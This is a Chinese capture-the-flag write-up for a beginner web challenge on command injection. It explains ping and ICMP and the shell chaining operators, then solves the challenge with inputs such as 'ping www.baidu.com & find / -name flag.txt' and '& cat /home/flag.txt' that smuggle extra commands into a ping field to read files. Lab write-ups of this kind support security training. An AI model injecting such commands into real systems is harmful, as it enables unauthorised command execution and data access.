攻防世界-web-新手区-command_execution

题目

 

考查知识

命令执行漏洞的了解

ping相关知识

waf相关知识

命令拼接

ping命令相关知识

ICMP协议是“Internet Control Message Protocol”（因特网控制消息协议）的缩写。它是TCP/IP协议族的一个子协议，用于在IP主机、路由器之间传递控制消息。

 

ping (Packet Internet Groper)，因特网包探索器，用于测试网络连接量的程序。Ping发送一个“ICMP回声请求消息”给目的地并报告是否收到所希望的ICMP echo （ICMP回声应答）。它是用来检查网络是否通畅或者网络连接速度的命令

 

ping命令通常用来作为网络可用性的检查。ping命令可以对一个网络地址发送测试数据包，看该网络地址是否有响应并统计响应时间，以此测试网络。

 

ping和ICMP的关系：ping命令发送数据使用的是ICMP协议。

&& 命令拼接 相关知识

命令拼接符
|、||、&、&&的区别：
&：无论左边是false还是true，右边都执行
&&：具有短路效果，左边是false，右边不执行。
|:无论左边是false还是true，右边都会执行
||：具有短路效果，左边是true，右边不执行。

 

在Linux中执行 ping www.baidu.com && ls

能看到，两条命令都被执行了

 

waf相关知识

请移步这篇文章

https://mp.weixin.qq.com/s?__biz=MzU4NjY0NTExNA==&mid=2247483729&idx=1&sn=599fabde18408d79006692d3a74a8ebd&chksm=fdf96a44ca8ee3520f10afc421bb3e336aa78d560290099e4749ada9f51cee017a789e96f778&scene=21#wechat_redirect

命令执行漏洞相关知识

 移步这篇文章

https://blog.csdn.net/LYJ20010728/article/details/117349106

获取场景

 

 

思路

题目是命令执行漏洞，我们直接拼接一个命令 ping www.baidu.com & ls

发现当前目录夏，只有index.php，没有flag.txt，先找flag.txt在那个目录下面

 

 

ping www.baidu.com & find / -name flag.txt

找到了flag.txt的路径

 

 

查看flag.txt的内容

ping www.baidu.com & cat /home/flag.txt，拿到flag